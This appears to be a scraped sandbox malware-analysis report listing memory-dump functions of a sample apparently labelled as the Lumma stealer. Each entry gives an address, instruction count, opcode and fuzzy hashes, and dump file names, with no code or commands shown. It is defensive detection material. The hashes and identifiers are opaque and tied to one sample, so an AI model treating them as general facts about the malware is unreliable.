Opcode ID: 7ca12eb94063ce2bf832323ebc667de86174c964b4e0a534c91ffa9491695d2f
Instruction ID: 4af4dc71f629bce39c4736af435bc9e93be96bdaf5f7bb6ed8be5a6d9342707c
Opcode Fuzzy Hash: 7ca12eb94063ce2bf832323ebc667de86174c964b4e0a534c91ffa9491695d2f
Instruction Fuzzy Hash: 11210878A0410E9BCB04EFA8D5486EEBBF2FF89301F108169D515A7384DB756D05CFA2

Function 07286E88 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ca5186f1d19c83a321b818b497164b7020445274aa954d414c3700daaa8f3f0
Instruction ID: f40aebf251b7f5422d23e16cda6e956943e788649d983bc29e27b6eb911dc526
Opcode Fuzzy Hash: 8ca5186f1d19c83a321b818b497164b7020445274aa954d414c3700daaa8f3f0
Instruction Fuzzy Hash: F111E1B13502068FCB956B28D418A3D3BA6EFC8762700443AE906CB796DF32C812C791

Function 02CDD3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1551533753.0000000002CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cdd000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction ID: 021f89bcac892b38f211031935ee29987650f0fdf5979ee286862cbcfa9efaf2
Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction Fuzzy Hash: 7D112676904240CFCB05CF00D5C0B16BF72FB84324F24C5ADD9090B656C33AE55ACBA1

Function 072A48C0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a09c79d17419f3de5c5ed6fd00fff345305ffdb1c152105449d9e1aabb5daf4e
Instruction ID: 69b46e5d8a317011b80c0e89a183265f62f1943e3a30081fae674d393dd19dc4
Opcode Fuzzy Hash: a09c79d17419f3de5c5ed6fd00fff345305ffdb1c152105449d9e1aabb5daf4e
Instruction Fuzzy Hash: 2B11CEB5D10188EFCB80DFA8D941AECBBB0EF46310F2485DA881897351D7729A12DB81

Function 07240BE9 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cbaae240c3138d350b8a35d6b2c4a5b72238d940ebe6eda3022d4b00b124369
Instruction ID: 4f05684a810750875cb21a17fbf31ec517ed7b013307cb8c1d7aeea744378b79
Opcode Fuzzy Hash: 7cbaae240c3138d350b8a35d6b2c4a5b72238d940ebe6eda3022d4b00b124369
Instruction Fuzzy Hash: AE11E5B1C15248FFCB55DFE8C4416EDBFB5EF0A200F1084DAD94893242DA314E91DB91

Function 0724FA40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15f083cfac60f2d5f1769a407bde7926a0a7a49e5cfc979c3c3f89da50b33a66
Instruction ID: 77af456cf41ce7a76be7f9136b2d2c228c8dc7826005e8664281a92ad17a20f8
Opcode Fuzzy Hash: 15f083cfac60f2d5f1769a407bde7926a0a7a49e5cfc979c3c3f89da50b33a66
Instruction Fuzzy Hash: 7A016776350255AFDB148F59EC85F9B77A9FBC8721F108066FA15CF390CAB1D81487A0

Function 0724ADA8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e01160932f11029812a5be4e5fc89d31076899546bde6ec6eb09c8624eaf51a5
Instruction ID: ea69c9805e84291ebdcb020f597bf16886095b3b00d36a01371e09a781c8f211
Opcode Fuzzy Hash: e01160932f11029812a5be4e5fc89d31076899546bde6ec6eb09c8624eaf51a5
Instruction Fuzzy Hash: FF1139B5E00219DBCF04DFA8D4446EEBBF5EB89311F10406AD509B3340D7755A44CBA1

Function 07286E82 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77d28098b23aa91ed6a83fe000f574596882d3b7c2ae28e920bced3018b8bb9d
Instruction ID: 2c075b812369c1a01c7cbf721946fd242588c4ae6a27b261f75c8e602586ec6b
Opcode Fuzzy Hash: 77d28098b23aa91ed6a83fe000f574596882d3b7c2ae28e920bced3018b8bb9d
Instruction Fuzzy Hash: FB01B1B6311202CFCB556B24D418A2977A6EF89762704443AE906CB796DF36C912CB91

Function 0728E3F9 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 801af74cd120448f47d650614c2c90ef34b704a5a69e380d61749a3f04f08a99
Instruction ID: 5632de87c9e81b3b193579b72094b24e8dc886715719bb1977b531b79552c460
Opcode Fuzzy Hash: 801af74cd120448f47d650614c2c90ef34b704a5a69e380d61749a3f04f08a99
Instruction Fuzzy Hash: 1C01C0B1B113049FD325AB34D404B3A7BA6AFCA320F18466DD5464B7D2CB76E8428791

Function 072842B0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40915b9765f021126202d676d41de34bf3cb0306f145a384f968a5a34124a94
Instruction ID: 38609ca0d3490557d831302c86dc8ddd9ae14cc356a160b29cc972b2ba13e909
Opcode Fuzzy Hash: c40915b9765f021126202d676d41de34bf3cb0306f145a384f968a5a34124a94
Instruction Fuzzy Hash: BA01B1F5604347AFD714EF98D440B9ABBF5EF05220F1544AAE580D7291D631A9C0CB90

Function 072A52F9 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3f4ac654b07aaf90a0746a2d1d687315772cafdf8333479744e045c2c37a8ce
Instruction ID: f071f2854ec682611063dbca2b7f215e3bf8bfa02b7cae4b3f1941926bf7fe27
Opcode Fuzzy Hash: a3f4ac654b07aaf90a0746a2d1d687315772cafdf8333479744e045c2c37a8ce
Instruction Fuzzy Hash: 56111974E152589FDB14EF68E4947DEBBB3FB85300F1080A9D106AB384CBB89E818F41

Function 07288CE8 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3894b2ad5628cc837e6f96c94299813cf28f546fe08c04ede2e3ea954f0c711b
Instruction ID: 9128605e78e3d80cdd9473fe865993f7336be4821a57982745eb9248d8527f38
Opcode Fuzzy Hash: 3894b2ad5628cc837e6f96c94299813cf28f546fe08c04ede2e3ea954f0c711b
Instruction Fuzzy Hash: A4F0FC77B5010967C7146669E854DEAF7AAEF84330F144036F915C7361EF319D1286D0

Function 0728C301 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ed4d12e8bc4c9ef41d4339edc91227e56722d33985d45b5cc3ca4d684f6f913
Instruction ID: e90e129f31a61294032c150c2bba9a4b456d7545421265757914d46796c103c0
Opcode Fuzzy Hash: 0ed4d12e8bc4c9ef41d4339edc91227e56722d33985d45b5cc3ca4d684f6f913
Instruction Fuzzy Hash: E601B135301610EFCB459B24D414A5ABBE7EF8D721B14816AEA0A8B391CF32EC52CBD1

Function 0728FBF7 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2494bb993a7c3ebc4aac41ceecdc61fa212d1c97eb8fa29b4a75dbdd7f5eebf
Instruction ID: 3aff095586680d0a13ab2792b9bc2a488020c2f8c0d3d87da0a69a395c6c1de3
Opcode Fuzzy Hash: a2494bb993a7c3ebc4aac41ceecdc61fa212d1c97eb8fa29b4a75dbdd7f5eebf
Instruction Fuzzy Hash: 0D01F7327502149FCF15EB64C45969ABBB6EB88310F14806AE9055B381CE725D1287D2

Function 0724BBB0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30cf9146766b8549e1393387fbada95f72050f763b261d96999d0f644e8e9140
Instruction ID: 957f7b61fc811ebf9a977ab6e78b35068263df939ad1ceeea098f00e5518b49f
Opcode Fuzzy Hash: 30cf9146766b8549e1393387fbada95f72050f763b261d96999d0f644e8e9140
Instruction Fuzzy Hash: 851170B0E2420CCFDB18DF69D9497DDB7F6EB8A300F4080A5D509AB244DB745884CF55

Function 02CDD785 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1551533753.0000000002CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cdd000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0503738cc673de1e9b96d183a039e26a3deaad8cae9c21f391af7f32aa549ce0
Instruction ID: 1da9325bcf38998a64e8a299c4893926699a9c8b1bd7e7463d12856e00aa274f
Opcode Fuzzy Hash: 0503738cc673de1e9b96d183a039e26a3deaad8cae9c21f391af7f32aa549ce0
Instruction Fuzzy Hash: 5C0120329083409FE7204F15CDC4B26FFDCDF81235F05C499EE0A0A186C7799844CA71

Function 0728E408 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 416c1d0f26c900c9ca106d6fce21d4982867412087b3422cf86cf7b9deb4010b
Instruction ID: af71c56beeac52d4a37b706ab632cbb11ae3c33147ea717c24b5998825db6dc8
Opcode Fuzzy Hash: 416c1d0f26c900c9ca106d6fce21d4982867412087b3422cf86cf7b9deb4010b
Instruction Fuzzy Hash: 9F01B1B17102049FC324AB34C444B3A77E2AFC9310F148A6CD55A4BBD1CB76EC42C791

Function 072AF2E8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a24b6d393f84e263a588392c22d8d0885c529cac65ccc88a82a55d8b3d4f05fa
Instruction ID: 2e60fb626a0189567a7e14fb7dd00390be741d6824c952605487ca337921513e
Opcode Fuzzy Hash: a24b6d393f84e263a588392c22d8d0885c529cac65ccc88a82a55d8b3d4f05fa
Instruction Fuzzy Hash: 7F0192B1D2928ADFCB14CFA9D5412EEBFF2EF45310F1481AAD00896241D7788686CB41

Function 07280CF8 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd6da4e869c605bc3e6ddc0f022a237a232f068e5886717477c0a512ea9a0150
Instruction ID: 03fa544163f2b3beadc0a3f32d821f33420b52a57c117b4bee14148f8035a6df
Opcode Fuzzy Hash: cd6da4e869c605bc3e6ddc0f022a237a232f068e5886717477c0a512ea9a0150
Instruction Fuzzy Hash: EAF0C2313111118FC7109A1DD890F26F7DAFBC9711B2180B9E609CB365CE32EC0187E0

Function 0728C089 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2c460fad77cb809f01589a93f01cd86997247c6be6537996cfe775c7c0c831b
Instruction ID: 86c440fdd1fdac899f36081e33cfc3bf9169df98d5571b2f717e04834cab7054
Opcode Fuzzy Hash: f2c460fad77cb809f01589a93f01cd86997247c6be6537996cfe775c7c0c831b
Instruction Fuzzy Hash: F101A4353113009FC7159B29C864E667BABEFC9721B09409AF9468F362CE71EC41C760

Function 073665C0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0f618b7084d6478673e51b111b52ed0580872b9df0d1fa4307e1fc765c6ee76
Instruction ID: 98d6c36a67a681ee09e907fc71a44cf71e68a888373dedb9f9f3bae719215346
Opcode Fuzzy Hash: b0f618b7084d6478673e51b111b52ed0580872b9df0d1fa4307e1fc765c6ee76
Instruction Fuzzy Hash: 600117B4E04209DFDB40EFA8D48A2AEBBF5FB49300F10816AC918E3744DB745A41CF91

Function 0728C310 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac2384ad01da8bbfaa5132b3ed84e97d6697bbd7037cededce28c5f09700604d
Instruction ID: 3cdaef35ae9d69b699ec22f7bf93afb0a4495d3fb8cdc563dbf55359e04b0658
Opcode Fuzzy Hash: ac2384ad01da8bbfaa5132b3ed84e97d6697bbd7037cededce28c5f09700604d
Instruction Fuzzy Hash: 2501A435300614EFCB459B24D018A5AB7E7EFCD721B108129EA0A8B390CF32EC42CBD0

Function 0728E5F0 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb303ddc4be676a18f462600ba2afba1fb08def88e17b6f5485e9d1bb0f53fe2
Instruction ID: c1733fef69918d02353c0442635b8d83fa5fbacfe3d9a26a1480cc953b1bf251
Opcode Fuzzy Hash: fb303ddc4be676a18f462600ba2afba1fb08def88e17b6f5485e9d1bb0f53fe2
Instruction Fuzzy Hash: 7EF027B6B053047BC301A6699812ACEBFAECFC5330F0180AFF408C7291D9B6190187A6

Function 07289BA1 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0d4265c3d7ff8fbf192cb2f666a951b9e2a65132713ef419e531263c5061191
Instruction ID: d6b46d3aa1e2882a2c0a06c486917c2a5e309fa1a4f9a03ceb8ff9219d56dc9e
Opcode Fuzzy Hash: f0d4265c3d7ff8fbf192cb2f666a951b9e2a65132713ef419e531263c5061191
Instruction Fuzzy Hash: E0F0A07238D3B24FCB136639BC510E23FF64B4A1203290397E495CB397D5189E498B92

Function 072880F8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a1dd8824a6fb8eae000160b0df936bed7ae407f263b1f418f5dcd6da477e30f
Instruction ID: 9cc6c5138bfa9693455583624eb95f8f09d9f3f013fcefa905c3c8d622a93b2d
Opcode Fuzzy Hash: 5a1dd8824a6fb8eae000160b0df936bed7ae407f263b1f418f5dcd6da477e30f
Instruction Fuzzy Hash: 69E02BB5F2B2635BD76114587C51BE7DAE5DBC5610F84017FF844CB250C905CC468BE2

Function 0724EE70 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d21b10372ae7b03a63245bf00fde2d352071c0cd210023c4a8266e5a7901d6df
Instruction ID: e93c94c6ccedb01daee4255c93d3b321dcdffc3ef9a35fe2463879bca332a05b
Opcode Fuzzy Hash: d21b10372ae7b03a63245bf00fde2d352071c0cd210023c4a8266e5a7901d6df
Instruction Fuzzy Hash: 62F05972F042125FF3288618A804B2BF7E9EBC9320F154429E4099B340DAB6EC4183C4

Function 073665D0 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00e494a527187e0bf5b129651698276d72f56a29bd73453706585973e65fb6bb
Instruction ID: 9b8e04232152bbf74124efa0f48a56b1b0103bd46cd61b52f6d562647cf21cfb
Opcode Fuzzy Hash: 00e494a527187e0bf5b129651698276d72f56a29bd73453706585973e65fb6bb
Instruction Fuzzy Hash: F401E5B4E04209DFCB40EFA8D48A2AEBBF5FB49300F10816AC909A3348D7745A41CF91

Function 02CDD784 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1551533753.0000000002CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cdd000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8108510f545b1c88ac704816cf4feff1a5a617097be634eabfb1989ac9300496
Instruction ID: 38ae95ad1baf5ce3cf32f63ad1dd93e253e5b60359db9f65f40ea4a3677818a4
Opcode Fuzzy Hash: 8108510f545b1c88ac704816cf4feff1a5a617097be634eabfb1989ac9300496
Instruction Fuzzy Hash: 88F096728083449EE7208F15CD84B62FFD8EB81735F18C59AED094B296C3799844CBB1

Function 07288148 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75725ba2566c8fd2920f15eea7eaab3adfd4d91e602db06774de6c6f50d43d99
Instruction ID: eb7fd5bd8b82a803c6e37f385ecbc36ae87312719810be2f26c6459e31e6d00e
Opcode Fuzzy Hash: 75725ba2566c8fd2920f15eea7eaab3adfd4d91e602db06774de6c6f50d43d99
Instruction Fuzzy Hash: CAF082336043155FD7219A55E880CCBFBBBDEC52613189637E10A8F125DA74A94A8790

Function 072811AF Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6178ed54437e29644ac007b0adb2eb276ddf12c8b5b8ffdf31c89bd87e1ebdab
Instruction ID: ee56a8835e5bc5605eeaf28e43bc0374e797fb8723cc6c870928f39109a18b4f
Opcode Fuzzy Hash: 6178ed54437e29644ac007b0adb2eb276ddf12c8b5b8ffdf31c89bd87e1ebdab
Instruction Fuzzy Hash: EDF0F072A0434AAFCB06CBA4E48C6CDBFB2AF42210F18809BD04587291D7791AC5CB80

Function 07240C31 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86d6bd0b9d156245b9c7c4deb4048914306d2d44ad82055667a6697c26ba6062
Instruction ID: 43659456b2fed4b850287dc8f776d8b5d1b5ad772a48bf1142433e7abf25261e
Opcode Fuzzy Hash: 86d6bd0b9d156245b9c7c4deb4048914306d2d44ad82055667a6697c26ba6062
Instruction Fuzzy Hash: 29F06D75918248EFCB55CFA8C8816ACBFB1EF49200F14C0DAD85893342D6395A61DF40

Function 0728C098 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3922ece339296a6c0b891d2a07deb1df9efb4512d36e7c29185f7bf4c36ce2f5
Instruction ID: d8042aa9f85cb48ec6d09a5160b3e614da9c5203357bebdb879372a8f63dce01
Opcode Fuzzy Hash: 3922ece339296a6c0b891d2a07deb1df9efb4512d36e7c29185f7bf4c36ce2f5
Instruction Fuzzy Hash: 13F05E393106009FD718DB19D464D3A77ABEFC8721B14446AFA068B360CE71EC42CB90

Function 072AB9C0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38c65bb4c56ee4969d894668e2e023f838012058f386f27312ed5586197de5ba
Instruction ID: 70e52665ec9c3094bc60f8b62df09513fddf4d5a52b810d3322cb96a07bb648c
Opcode Fuzzy Hash: 38c65bb4c56ee4969d894668e2e023f838012058f386f27312ed5586197de5ba
Instruction Fuzzy Hash: CAF090B6D14249BFCB80CFA8C841BADBFF8AF49300F14C09AE868D2241C6359A51DF50

Function 0736B328 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fa7456b8575009f545c9de16badab99463ccf612d47d4240c155fb59fa336d
Instruction ID: e4aa13ab5f5cd40c20e43eca9949fc9f775e705842950448fd3d3fa825f25333
Opcode Fuzzy Hash: 80fa7456b8575009f545c9de16badab99463ccf612d47d4240c155fb59fa336d
Instruction Fuzzy Hash: C8F06276908249EFCB02CFA4C8415ACFF75EF4A210F248199D89893252D7315A25DB40

Function 0736A178 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7089b052d1c0265ae1d1eeb6197b72a2fbaed0072512913a6c46375f25bffddb
Instruction ID: 0dc62fd3b02f7547c2cd0c015413c017c95f8d4aaad3c1200c10c076a4fea388
Opcode Fuzzy Hash: 7089b052d1c0265ae1d1eeb6197b72a2fbaed0072512913a6c46375f25bffddb
Instruction Fuzzy Hash: C3F0F9B6D04208FFDB40DF98C845AEDBBB5EF58310F10C199ED29A2290D7369A61DF40

Function 07242201 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d24840c4c1d5c580b8751c52a645d0919ff3989a532d69cae66ac4ac7cab27f7
Instruction ID: d794fab8797a10cf90f0b68bde558eac9826584ba3865d3ff3fad27f19aa2266
Opcode Fuzzy Hash: d24840c4c1d5c580b8751c52a645d0919ff3989a532d69cae66ac4ac7cab27f7
Instruction Fuzzy Hash: A9F09AB4D28248EFC745CFA8C8826ADBFF4EF1A300F1481EAE84893242D6354E16CB50

Function 07368219 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbbaadb41f2c1a3220a28667f3973a95d4fa2e866a0cece1f2d06eca115abb86
Instruction ID: 27631341745c6f33d85f9bd825682335561ee72fd562024587fc922d27cd7877
Opcode Fuzzy Hash: cbbaadb41f2c1a3220a28667f3973a95d4fa2e866a0cece1f2d06eca115abb86
Instruction Fuzzy Hash: F701C9B4E04258CFEB50CF69D4597DDBBF2AB8A300F1480A6D50DA7349D7745E858F01

Function 0736AAA0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff2a1c56d5b22e203e013816bf9a1b8dae4d06b0c7c748659ffc6ca0e085499f
Instruction ID: 2906f6be919ea8dd0149bb951821c6cc2e31ed09f5926b12b28614bcb49e6912
Opcode Fuzzy Hash: ff2a1c56d5b22e203e013816bf9a1b8dae4d06b0c7c748659ffc6ca0e085499f
